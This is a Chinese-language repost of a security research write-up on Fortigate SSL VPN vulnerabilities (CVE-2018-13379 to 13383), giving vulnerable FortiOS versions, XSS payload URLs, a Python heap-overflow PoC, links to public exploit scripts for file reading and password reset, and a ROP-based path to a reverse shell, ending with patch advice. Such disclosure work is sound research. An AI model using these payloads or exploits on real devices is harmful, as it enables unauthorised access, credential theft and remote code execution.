其他分享
首页 > 其他分享> > Fortigate SSLVPN漏洞分析和利用

Fortigate SSLVPN漏洞分析和利用

作者:互联网

0x00 前言

该事情发生于去年8月,当时我们开始了一个新的SSL VPN研究项目。与ipsec和pptp等站点到站点VPN相比,ssl vpn更易于使用,并且可与任何网络环境兼容。为了方便起见,ssl  vpn成为企业最流行的远程访问方式!
但是,如果这个可信的设备是不安全的呢?它是一项公司的重要资产,但却是公司的盲点。根据我们对财富500强的调查,排名前三的SSL VPN供应商占据了大约75%的市场份额。ssl-vpn的多样性很小。因此,一旦我们发现领先的ssl-vpn存在严重漏洞,其影响将是巨大的。没有办法降低损失,因为SSL VPN必须暴露在互联网上。
在我们的研究开始时,我们对领先的SSL VPN供应商的CVE数量进行了一些调查: 看起来Fortinet和Pulse Secure的VPN是最安全的。是真的吗?作为一个打破记录的破坏者,我们接受了这一挑战,并开始攻击Fortinet和Pulse Secure!这个故事是关于黑客攻击Fortigate SSL VPN。

 

0x01 漏洞影响

FortiOS 5.6.3 to 5.6.7
FortiOS 6.0.0 to 6.0.4
ONLY if the SSL VPN service (web-mode or tunnel-mode) is enabled.

0x02 Fortigate SSL VPN

Fortinet将其SSL VPN产品线称为Fortigate SSL VPN,这在终端用户和中型企业中很常见。有超过480000台服务器在互联网上运行,在亚洲和欧洲很常见。我们可以通过在url后加上路径/remote/login来识别它。Fortigate的技术特点如下:    我们从文件系统开始研究。试图在/bin/目录中列出二进制文件,发现所有符号链接都指向/bin/init,就像这样:    fortigate将所有程序和配置编译成一个二进制文件,这使得init非常大。包含数千个函数,没有符号!只包含SSL VPN所    需的程序,因此对黑客来说,环境真的很不方便。例如,甚至没有/bin/ls或/bin/cat!    在这两个Web服务中,他们还将自己的apache模块编译成二进制文件来处理每个URL路径。我们可以找到一个指定处理程序    的表并深入研究它们。

0x03   漏洞介绍

我们发现了以下几个漏洞: 1.CVE-2018-13379:未授权任意文件读取 在获取相应的文件时,它使用以下参数构建json文件路径lang:
snprintf(s, 0x40, "/migadmin/lang/%s.json", lang);
没有安全保护,而是自动附加了文件扩展名。似乎我们只能读取JSON文件。然而,实际上我们可以滥用snprintf的特性。根据帮助手册,它最多将size-1写入到输出字符串中。因此,我们只需要使它超过缓冲区的大小,并且.json将被剥离。然后我们就可以随心所欲读取任何内容
攻击POC: https://github.com/milo2012/CVE-2018-13379
2.CVE-2018-13380:未授权XSS 有几个XSS:
/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1)%3C/script%3E
/remote/loginredir?redir=6a6176617363726970743a616c65727428646f63756d656e742e646f6d61696e29
/message?title=x&msg=%26%23<svg/onload=alert(1)>;
3.CVE-2018-13381:未授权堆溢出 在编码HTML实体代码时,有两个阶段。服务器首先计算编码字符串所需的缓冲区长度。然后它将编码到缓冲区中。例如,在计算阶段,将字符串编码为<is&60,这将占用5个字节。果它遇到任何以&开头的内容,例如&60;,它会认为已经编码了一个令牌,并直接计算它的长度。像这样:
c = token[idx];
if (c == '(' || c == ')' || c == '#' || c == '<' || c == '>')
    cnt += 5;
else if(c == '&' && html[idx+1] == '#')
    cnt += len(strchr(html[idx], ';')-idx);
但是,长度计算和编码过程之间存在不一致。编码部分处理不了那么多
switch (c)
{
    case '<':
        memcpy(buf[counter], "&#60;", 5);
        counter += 4;
        break;
    case '>':
    // ...
    default:
        buf[counter] = c;
        break;
    counter++;
}
如果我们输入了一个恶意字符串,如&#<<<,则<仍然被编码为&#60;,所以结果应该是&#&#60;&#60;&#60;;,这比预期的长度6字节长得多,因此会导致堆溢出。
PoC:
import requests

data = {
    'title': 'x', 
    'msg': '&#' + '<'*(0x20000) + ';<', 
}
r = requests.post('https://sslvpn:4433/message', data=data)
4.CVE-2018-13382:神奇的后门 在登录页面中,我们发现了一个名为magic的特殊参数。一旦参数符号硬编码字符串,我们就可以修改任何用户的密码。
 根据我们的调查,目前仍有大量的Fortigate SSL VPN缺少打补丁。因此,考虑到其严重性,我们不会透露magic字符串。但是,CodeWhite的研究人员已经复制了这个漏洞。毫无疑问,其他攻击者很快就会利用此漏洞!请尽快更新您的Fortigate!

 


其POC: https://github.com/milo2012/CVE-2018-13382

Fortinet FortiOS 6.0.0到6.0.4,5.6.0到5.6.8以及SSL VPN Web门户下的未授权漏洞允许未经身份验证的攻击者修改SSL VPN Web门户用户的密码通过特定的HTTP请求。

 

$ python CVE-2018-13382.py  -h
Usage: CVE-2018-13382.py [options]

Options:
  -h, --help   show this help message and exit
  -i IP        e.g. 127.0.0.1:10443
  -u USERNAME  
  -p PASSWORD  
5.CVE-2018-13383:授权的堆溢出 这是WebVPN功能上存在的一个漏洞。在HTML中解析JavaScript时,它会尝试使用以下代码将内容复制到缓冲区中:
memcpy(buffer, js_buf, js_buf_len);
缓冲区大小固定为0x2000,但输入字符串不受限制。因此,这是堆溢出。值得注意的是,此漏洞可能会溢出空字节,这对我们的利用非常有用。 要触发此溢出,我们需要将漏洞利用上传到HTTP服务器上,然后ssl vpn将我们的漏洞利用代理为一个普通用户

0x04  漏洞利用

官方咨询最初没有描述RCE风险。实际上,这是一个误解。我们将向您展示如何在没有身份验证的情况下从用户登录界面中进行攻击。
1.CVE-2018-13381 我们的第一次尝试是利用未授权堆溢出漏洞。但是,此漏洞存在一个缺陷 - 它不会溢出空字节。一般来说,这不是一个严重的问题。如今的堆利用技术应该克服了这个问题。然而,我们发现在Fortigate上发生了一个严重的问题。有几个障碍,使堆溢出不稳定,难以控制。    这会干扰堆,但无法控制。我们无法仔细操作堆,因为它会被销毁。   直到连接结束,才会有内存free()。我们无法在单个连接中操作堆。实际上,这可以有效地缓解堆漏洞,特别是在空闲后使用。 2.CVE-2018-13379 + CVE-2018-13383 这是pre-auth文件读取和post-auth堆溢出的组合。一个用于获取身份验证,一个用于获取shell。
   我们遇到了一个有趣的崩溃错误,令我们惊讶的是,我们几乎控制了程序计数器!   该崩溃错误,就是为什么我们喜欢模糊测试的源!;)
0x00007fb908d12a77 in SSL_do_handshake () from /fortidev4-x86_64/lib/libssl.so.1.1
2: /x $rax = 0x41414141
1: x/i $pc
=> 0x7fb908d12a77 <SSL_do_handshake+23>: callq *0x60(%rax)
(gdb)
事情发生在 SSL_do_handshake()
int SSL_do_handshake(SSL *s)
{
    // ...
 
    s->method->ssl_renegotiate_check(s, 0);
 
    if (SSL_in_init(s) || SSL_in_before(s)) {
        if ((s->mode & SSL_MODE_ASYNC) && ASYNC_get_current_job() == NULL) {
            struct ssl_async_args args;
 
            args.s = s;
 
            ret = ssl_start_async_job(s, &args, ssl_do_handshake_intern);
        } else {
            ret = s->handshake_func(s);
        }
    }
    return ret;
}
我们重写了struct ssl调用方法中的函数表,因此当程序试图执行s->method->ssl_renegotiate_check(s, 0);,时,它就会崩溃 这实际上是我们利用的理想目标!struct SSL可以轻松触发分配,并且大小接近我们的JaveScript缓冲区,因此它可以在我们的缓冲区附近有一个常规的偏移量!根据代码,我们可以看到ret = s->handshake_func(s);调用一个函数指针,这是控制程序流的最佳选择。根据这一发现,我们的利用策略就很清楚了 首先,用SSL结构对堆进行大量的正常请求,然后溢出SSL结构。这里我们将php poc放在一个http服务器上: PoC可以分为三个部分: (1).伪造的SSL结构 ssl结构有一个到缓冲区的常规偏移量,因此我们可以精确地伪造它。为了避免崩溃,我们将方法设置为包含空函数指针的位置。此时的参数是ssl结构本身s。但是,方法前面只有8个字节。我们不能简单地在HTTP服务器上调用system(“/bin/sh”),因此这对于我们的反向shell命令来说还不够。得益于巨大的二进制文件,很容易找到ROP小工具。我们发现一个对堆栈数据有用的方法:
push rbx ; or byte [rbx+0x41], bl ; pop rsp ; pop r13 ; pop r14 ; pop rbp ; ret ;
所以我们设置handshake_func为这个小工具,将rsp移动到我们的ssl结构,并进行进一步的ROP攻击。 (2).ROP链 这里的ROP链很简单。我们稍微向前移动RDI,以便有足够的空间来执行反向shell命令。 (3).溢出字符串 最后,我们连接溢出填充并利用。一旦我们溢出SSL结构,我们就会得到一个shell。 我们的漏洞需要多次尝试,因为我们可能会溢出一些重要的东西,并使程序在sSSL_do_handshake之前崩溃。不管怎样,由于Fortigate可靠的监视程序,该漏洞仍然是稳定的。只需1~2分钟即可获得反向shell.

0x05  漏洞演示

0x06 漏洞防御

升级到FortiOS 5.4.11,5.6.9,6.0.5,6.2.0或以上版本。

0x07  参考链接

https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html 
https://fortiguard.com/psirt/FG-IR-18 -384

 

标签:VPN,ssl,gadget,漏洞,SSLVPN,SSL,Fortigate,我们
来源: https://www.cnblogs.com/backlion/p/11353620.html